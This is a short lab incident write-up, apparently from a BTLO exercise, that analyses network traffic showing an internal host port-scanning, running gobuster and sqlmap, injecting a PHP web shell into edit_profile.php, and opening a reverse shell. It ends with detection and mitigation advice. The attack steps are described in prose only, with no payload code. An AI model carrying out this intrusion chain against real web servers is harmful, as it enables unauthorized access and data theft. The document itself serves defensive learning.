Detection and Analysis of Web Shell Activity Through Network Traffic
This analysis was conducted in a simulated lab environment for learning purposes.
Executive Summary
Analyzing internal private IPs that began scanning other internal systems. I found this network activity suspicious when one internal private IP performed reconnaissance via port scanning followed by command execution through a web shell, indicating potential system compromise.
Incident Metadata
Incident Type: Web Application Compromise
Data Source: PCAP
Environment: Simulated Lab (BTLO)
Severity: High
Detection & Initial Indicator
Initial indicators included multiple connection attempts to different ports from a single internal private IP within a short timeframe, suggesting reconnaissance activity.
Attack Timeline
Reconnaissance
The attacker attempted to scan various ports to find open ports.
Service Discovery
After scanning, the attacker found that port 80 was open. Then he conducted further reconnaissance with the gobuster and sqlmap tools.
Initial Access
Upon finding the uploads directory, the attacker planned to use a web shell technique to gain remote shell access. The attacker then injected the edit_profile.php file with malicious php code containing a webshell, allowing the attacker to execute commands in the url.
Command Execution
The attacker executed commands such as id and whoami, and most critically, executed a reverse shell command to gain remote shell access to the server.
Post exploitation
After obtaining remote shell access, the attacker executes commands such as ls -la, cd to opt, and also attempts to delete one of the php files.
Technical Analysis & Evidence
Reconnaissance Activity
This activity indicates that the IP (10.251.96.4) is conducting reconnaissance because it scans many ports in a short time and interval.
Initial Access
This evidence clearly shows that the attacker attempted to upload malicious php code to another php file in order to disguise it, which a normal user would not be able to do.
Post-Exploitation / Web Shell Activity
From this evidence, we can confirm that the attacker actually executed commands such as id and whoami to obtain further information, then performed a reverse shell technique and executed other commands once they obtained an interactive shell.
Impact
If this activity occurred in a production environment, potential impacts would include unauthorized remote access, exposure or manipulation of sensitive data, and the ability for further lateral movement within the network.
Mitigation
Detection Improvements
Alert on abnormal internal port scanning
Monitor HTTP requests containing command execution patterns
Mitigation Actions
Restrict file upload and execution permissions
Implement web application input validation
Enhance logging and monitoring
Conclusion
After all the analyses above, we are certainly reminded to further strengthen our security systems, especially web servers, because they have many vulnerabilities, such as in the case above, where there was no extra validation, allowing attackers to upload and inject malicious code.